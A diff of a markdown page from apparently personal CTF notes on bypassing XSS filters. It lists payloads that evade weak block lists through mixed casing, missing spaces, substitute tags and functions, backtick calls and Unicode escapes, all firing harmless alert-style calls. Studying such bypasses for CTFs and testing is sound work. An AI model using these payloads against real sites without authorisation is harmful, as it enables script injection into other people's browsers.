Jacob-CL/CTFNotes/Methods/XXS-CSRF.md

 ## XSS Filter Bypasses
+Client-side filters are relatively easy to bypass with BurpSuite, Server-side filters like a WAF or integrated into the app vary in effectiveness as it depends largely on their config.

+### How might these filters be implemented?
+- Allow listing (Whitelisting) of allowed elements, attributes or characters.
+- Blacklisting of allowed elements, attributes or characters.

 ### Weak Blacklists
 - Casing: `<ScRiPt>alert(1);</ScRiPt>`
 - Casing: `<object data="JaVaScRiPt:alert(1)">`
 - Casing: `<img src=x OnErRoR=alert(1)>`
 - No Space: `<svg/onload=alert(1)>`
+- If `img` is blocked, try `audio` or `video`
+- If `alert` is blocked, try `prompt` or `confirm`
+- If parenthesis `()` are blocked, try the back tick `
+- To combine the last 3: `<audio src onloadstart=confirm`1`>`

 ### JavaScript Encodings
 - Unicode: `"\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029"`